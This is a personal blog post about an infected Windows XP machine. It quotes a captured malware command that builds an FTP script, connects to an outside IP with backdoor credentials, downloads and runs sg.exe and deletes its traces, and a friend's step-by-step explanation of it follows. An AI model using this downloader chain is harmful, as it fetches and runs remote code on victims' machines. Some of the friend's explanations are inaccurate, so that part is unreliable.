We have a desktop (with Windows XP installed) which my mother uses for her daily work. Needless to say, she doesn’t know much beyond checking email. So, whenever she has a problem or the comp messes up, I have to do the dirty work.
Recently, my mom thought that the comp had suddenly slowed up and asked me to take a look. The comp was definitely infiltrated. Not only was it unusually slow, no new temporary file could be created. This is pretty serious, because common things like creating a zip file and burning CDs won’t work. First thing I did was run chkdsk. I found that one of the files inside TEMP was cross-linked to allocation block 20, at which point the chkdsk would hang.
I was randomly messing with the command line, in hope that something would work, when this script suddenly popped up.
22.214.171.124 43642 >> ij &echo user t g >> ij &echo get sg.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &sg.exe &net start SharedAccess &exit
I don’t think the user is supposed to see this, but something I did (wish I knew!) made this show up. Now, this was definitely an intrusion of some sort. I don’t know much about this stuff, so I fired this off to my good friend Jitesh Shah.Here is his reply (verbatim):
this script is connecting to a server and downloading sg.exe
and the ftp options mean the foll :
-n = suppress auto-login
-v = suppress display of server responses
-s:filename = specify an ftp file. commands in this file are executed serially.. as in a shell script
each command in a shell script is prefixed by “&”…
eg. &dir , &cls … etc
“net start” starts all the services…
here’s a little summary i managed :
(with a little change in ur copy pasted log… it should have been prefixed by the command “open”, as far as i know…
here’s what happens :
open 126.96.36.199 43642 >> ij
“ij” is a normal file. Output redirection is used.
i.e. “open 188.8.131.52 43642” is written to a file “ij”
&echo user t g >> ij
next line in file is “user t g”.. i.e. login to your computer using username “t” and password “g” (which means.. that there a backdoor already installed).
&echo get sg.exe >> ij
get the file “sg.exe” from the server. (probably a virus)
&echo bye >> ij
“bye” command quits ftp
&ftp -n -v -s:ij
execute ftp command in shell… and input file is ij … which now looks something like this
ij contents :
open 184.108.40.206 43642
user t g
remove the file “ij”…. cover the traces
execute the downloaded virus file in shell
&net start SharedAccess
start all services.. which are, by now, infected
quit shell.. work done !!
comp infected !!
So now, I’m going to Google this stuff a bit, and see if I can get the hang of this stuff. I’ll also be seeing if I can do some reverse engineering on sg.exe. What exactly does this exe do anyway? Is it a service in windows? I also wanna check if this script left some logs, and if I can get the attack IP. Nice! *Rubbing hands in delight!*